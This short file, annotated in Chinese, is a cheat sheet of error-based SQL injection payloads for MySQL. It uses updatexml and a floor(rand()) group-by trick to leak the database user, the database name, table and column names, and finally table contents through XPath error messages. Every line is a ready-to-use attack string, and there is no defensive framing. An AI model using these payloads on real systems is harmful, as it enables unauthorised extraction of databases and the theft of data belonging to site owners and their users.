```sql
--爆破用户名
-- updatexml
--由于0x7e是~，不属于xpath语法格式，因此报出xpath语法错误
1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);--+


-- payload
爆数据库名：
'and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名：
'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名：
'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据：
'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

```
